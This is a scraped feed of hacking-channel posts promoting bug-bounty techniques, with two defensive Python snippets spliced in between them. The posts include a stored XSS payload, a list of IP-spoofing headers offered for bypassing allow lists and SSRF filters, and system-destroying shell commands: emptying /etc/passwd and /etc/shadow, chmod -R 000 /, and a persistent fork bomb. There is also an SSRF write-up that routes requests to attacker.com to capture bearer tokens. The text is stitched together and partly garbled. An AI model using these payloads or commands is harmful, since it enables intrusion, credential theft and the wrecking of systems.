Brut Security
✅Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: [email protected]
⚡WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.

✅https://github.com/anmolksachan/wayBackLister

✅ Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity

#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating 🔥

Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!

Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"

Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
πŸ‘14
Good morning hackers 🥱
Need more Google bug POCs? 😁


πŸ“CPTS Cheat Sheet
πŸ”—
https://github.com/zagnox/CPTS-cheatsheet
🔥Sensitive information leaks via Fofa dorking 💥

Hey Hunters, DarkShadow back again, dropping a simple and effective dork.

Leaking Firebase configurations 👀

Fofa query:
body="firebaseapp" && domain="example.com"

Or

(body="firebaseapp" || body="firebaseconfig") && host=".target_domain_name_only"


If you guys really enjoy reading my methodologies, don't forget to follow me 👉🏼 DarkShadow

#dork #bugbountytips
Hey Hunters,
DarkShadow here, back again. Dropping a Google XSS POC-2 😁

✅POC steps:

•Vuln host: books.google.com
•XSS type: stored XSS
•Vuln params: book name/title and publisher name parameters.
•Technique: directly inject the payload, without any kind of encoding. (Reason: no input sanitization)
Payload: "><svg/onload=prompt(1)>

A simple payload can flip the game if you use it in the right place. 😁
The vulnerability has been patched 🥱

Let me know—aren't you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me 👉🏼
DarkShadow

#xss #googlebug
CVE-2025-20188: Use of Hard-coded Credentials in Cisco IOS XE, 10.0 rating 🔥🔥🔥

Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.

Search at Netlas.io:
👉 Link: https://nt.ls/BKkJI
👉 Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
Hey Hunters,

If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termux—no root required.


Explore it on GitHub:

https://github.com/termux/proot-distro
Hey Hunters
DarkShadow here — back again with some killer techniques most bug bounty hunters overlook.

IP Spoofing Headers for Bypass & Testing:

X-Forwarded-For: 127.0.0.1
# Trusted by proxies/load balancers
X-Real-IP: 127.0.0.1
# Common in NGINX setups
X-Client-IP: 127.0.0.1
# Used for rate limiting/tracking
X-Remote-IP: 127.0.0.1
# May influence backend logic
X-Remote-Addr: 127.0.0.1
# Tries to override remote IP
True-Client-IP: 127.0.0.1
# Used by CDNs (e.g. Akamai)
CF-Connecting-IP: 127.0.0.1
# Cloudflare real IP header
Fastly-Client-IP: 127.0.0.1
# Fastly CDN client IP
X-Cluster-Client-IP: 127.0.0.1
# Seen in clustered environments
Forwarded: for=127.0.0.1
# RFC standard version of XFF
X-Originating-IP: 127.0.0.1
# Used by mail servers & legacy apps
X-Forwarded-Host: 127.0.0.1
# Can affect virtual host routing
X-Forwarded-Server: 127.0.0.1
# Backend routing logic
X-Real-Hostname: localhost
# Tries to spoof internal host
Via: 127.0.0.1
# May appear in proxy chains
Forwarded-For: 127.0.0.1
# Non-standard but seen in wild
Proxy-Client-IP: 127.0.0.1
# Java-based servers (Tomcat)
WL-Proxy-Client-IP: 127.0.0.1
# WebLogic-specific header

Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.

Don't forget to follow me 👉🏼 DarkShadow

#bugbountytips #wafbypass
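As an added defensive example (not code from the post above): how a backend should resolve the client address so that none of the headers listed above can be spoofed by an untrusted sender. The trusted proxy ranges are constructed sample values, and only X-Forwarded-For from those hops is honoured.

```python
import ipaddress
from typing import Mapping

# Constructed sample: the proxies/load balancers we operate. Only hops in these
# ranges are allowed to append client addresses that we will believe.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("203.0.113.5/32"),
]


def _is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, headers: Mapping[str, str]) -> str:
    """Address to use for allow lists, rate limits and geo checks.

    remote_addr is the TCP peer the server actually accepted. Every header in
    the list above (X-Real-IP, CF-Connecting-IP, ...) is just a claim by
    whoever sent the request, so:
      * if the peer is not one of our proxies, ignore all IP headers;
      * otherwise walk X-Forwarded-For from the right (the part our proxies
        appended), skip our own hops, and stop at the first untrusted address.
    """
    if not _is_trusted(remote_addr):
        return remote_addr
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    candidate = remote_addr
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)  # junk such as "localhost" never becomes the client IP
        except ValueError:
            break
        candidate = hop
        if not _is_trusted(hop):
            break
    return candidate


def is_loopback_client(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """Gate for a 'localhost only' endpoint, decided on the resolved address."""
    return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback
```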
Big Us 🙂 💯
This is not for hacking, this is for hackers;

If you still haven't found anything in your bug hunting, then first apply this code in your file:

while(!success){
    tryagain();
    if(tried)
        break;
}


Never give up, you just need to change your mindset.
Remember, where everyone gives up, pros start there 😌
⚠️Don't try these DarkShadow commands:
Just dropping some of DarkShadow's nuclear bash demo commands 🚨

1οΈβƒ£πŸ‘‰πŸΌOverwrite /etc/passwd and /etc/shadow
echo "" > /etc/passwd
echo "" > /etc/shadow


Destroys all user accounts, including root.
Result: Nobody can log in anymore — system is fcked.



2οΈβƒ£πŸ‘‰πŸΌMake the system unusable (chmod all permissions)

chmod -R 000 /


Removes all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or login properly. Full chaos.



3οΈβƒ£πŸ‘‰πŸΌPersistent Fork Bomb (auto start even after reboot)

echo ':(){ :|:& };:' >> ~/.bashrc

or for all users:

echo ':(){ :|:& };:' >> /etc/bash.bashrc


Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.

Hard to recover unless you boot into recovery mode and manually edit.
ShodanX ⚡️ – A terminal-powered recon and OSINT tool built on top of the Shodan services to gather information on targets using Shodan dorks ✨

✅Link -
https://github.com/RevoltSecurities/Shodanx

👤 @mrz_0047

#BugBounty #cybersecurity #infosec #shodan
Hey Hunters,

DarkShadow here—back again with a very interesting Google SSRF Proof of Concept!


🧠 Fixing the Unfixable: A Google Cloud SSRF Tale

A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.


🔍 Discovery

While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:

cxl-services.appspot.com/proxy?url=

Here's a sample request:

GET /proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close

{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}


The response returned 200 OK and displayed the full content, meaning the SSRF was not blind — and that makes it critical.


🧱 Initial Test: Traditional SSRF Blocked

Trying to change the url parameter to a malicious domain:

GET /proxy?url=https://attacker_server.com HTTP/1.1
Host: cxl-services.appspot.com

Response:

403 Forbidden
Invalid Target Host - Please add to allow list


This indicated the presence of a backend whitelist restricting outbound requests.


🛡️ Whitelist Bypass Trick

Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:

GET /proxy?url=https://attacker.com\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com


This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.


🔓 Sensitive Token Leakage

Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.

By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:

docai-demo
cxl-services
garage-staging
p-jobs


He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.


💰 Bounty Rewards

For these critical findings, the researcher earned over $13,000 from Google's Vulnerability Reward Program (VRP).

Credit: Discovered by David Schütz
But Hunters, don't forget to follow me for more deep-dive writeups and live exploitation breakdowns!

Follow me on X 👉🏼
DarkShadow

#bugbountytips #googlebug #ssrf
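As an added example (not part of the write-up and not Google's code), the RFC 3986 vs. WHATWG disagreement from the bypass above reproduced in Python, beside an allow-list check that rejects it. The allow list is a constructed sample, and the WHATWG handling is an approximation (for http/https a backslash is treated as a forward slash).

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample allow list for an outbound proxy
ALLOWED_HOSTS = {"jobs.googleapis.com"}

# The bypass URL quoted in the write-up above
SAMPLE_BYPASS = "https://attacker.com\\@jobs.googleapis.com/"


def rfc3986_host(url: str) -> Optional[str]:
    """Host as Python's urlsplit sees it: userinfo runs up to the LAST '@',
    and a backslash is just an ordinary character inside the authority."""
    return urlsplit(url).hostname


def whatwg_host(url: str) -> Optional[str]:
    """Approximate WHATWG behaviour for special schemes (http/https): '\\' is
    treated as '/', so it ends the authority before the '@' is ever reached."""
    scheme, sep, rest = url.partition("://")
    if not sep or scheme.lower() not in ("http", "https"):
        return None
    normalized = rest.replace("\\", "/")
    return urlsplit(scheme + "://" + normalized).hostname


def naive_allowed(url: str) -> bool:
    """The kind of check the write-up describes being bypassed: one parser,
    compared against the allow list, while another component does the fetch."""
    return rfc3986_host(url) in ALLOWED_HOSTS


def hardened_allowed(url: str) -> bool:
    """Reject anything whose meaning depends on which parser reads it."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if "@" in parts.netloc or "\\" in url:   # no userinfo, no parser-dependent separators
        return False
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS:
        return False
    return whatwg_host(url) == host          # both interpretations must name the same host
```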